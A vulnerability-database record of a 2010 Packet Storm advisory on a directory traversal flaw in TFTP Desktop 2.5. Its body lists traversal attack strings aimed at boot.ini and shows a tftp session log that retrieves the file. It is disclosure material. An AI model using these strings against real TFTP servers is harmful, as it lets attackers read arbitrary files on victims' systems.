{"id": "PACKETSTORM:93400", "type": "packetstorm", "bulletinFamily": "exploit", "title": "TFTP Desktop 2.5 Directory Traversal", "description": "", "published": "2010-09-01T00:00:00", "modified": "2010-09-01T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/93400/TFTP-Desktop-2.5-Directory-Traversal.html", "reporter": "chr1x", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:23:50", "viewCount": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:23:50", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:50", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/93400/tftpddesktop-traversal.txt", "sourceData": "`+------------------------------------------------------------------------+ \n| ....... | \n| ..''xxxxxxxxxxxxxxx'... | \n| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | \n| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | \n| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | \n| .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | \n| .xxxxxxxxxxxxxxxxxx'... ........ .'. | \n| 'xxxxxxxxxxxxxxx'...... '. | \n| 'xxxxxxxxxxxxxx'..'x.. .x. | \n| .xxxxxxxxxxxx'...'.. ... .' | \n| 'xxxxxxxxx'.. . .. .x. | \n| xxxxxxx'. .. x. | \n| xxxx'. .... x x. | \n| 'x'. ...'xxxxxxx'. x .x. | \n| .x'. .'xxxxxxxxxxxxxx. '' .' | \n| .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | \n| .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | \n| .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | \n| .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | \n| .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | \n| .'xxxxxxx'.... ...xxxxxxx'. | \n| ..'xxxxx'.. ..xxxxx'.. | \n| ....'xx'.....''''... | \n| | \n| CubilFelino Security Research Labs | \n| proudly presents... | \n+------------------------------------------------------------------------+ \n \n \nAuthor: chr1x (chr1x@sectester.net) \nDate: August 30, 2010 \nAffected operating system/software, including full version details \nTFTP Desktop version 2.5, Tested on Windows XP PRO SP3 \nDownload: \nhttp://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe \n \nHow the vulnerability can be reproduced \n \nAttack strings below: \n \n[*] Testing Path: .../.../.../boot.ini <- Vulnerable string!! \n[*] Testing Path: .../.../.../.../boot.ini <- Vulnerable string!! \n[*] Testing Path: .../.../.../.../.../boot.ini <- Vulnerable string!! \n[*] Testing Path: .../.../.../.../.../.../boot.ini <- Vulnerable string!! \n[*] Testing Path: .../.../.../.../.../.../.../boot.ini <- Vulnerable string!! \n[*] Testing Path: .../.../.../.../.../.../.../.../boot.ini <- Vulnerable string!! \n[*] Testing Path: ...\\...\\...\\boot.ini <- Vulnerable string!! \n[*] Testing Path: ...\\...\\...\\...\\boot.ini <- Vulnerable string!! \n[*] Testing Path: ...\\...\\...\\...\\...\\boot.ini <- Vulnerable string!! \n[*] Testing Path: ...\\...\\...\\...\\...\\...\\boot.ini <- Vulnerable string!! \n[*] Testing Path: ...\\...\\...\\...\\...\\...\\...\\boot.ini <- Vulnerable string!! \n[*] Testing Path: ...\\...\\...\\...\\...\\...\\...\\...\\boot.ini <- Vulnerable string!! \n \nConfirmation log: \n \nroot@olovely:/# tftp \ntftp> connect \n(to) 192.168.1.53 \ntftp> ascii \ntftp> get \n(files) .../.../.../.../.../.../boot.ini \nReceived 211 bytes in 0.0 seconds \ntftp> quit \n \nWhat impact the vulnerability has on the vulnerable system \n \n* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem. \n \n \n`\n"}

{}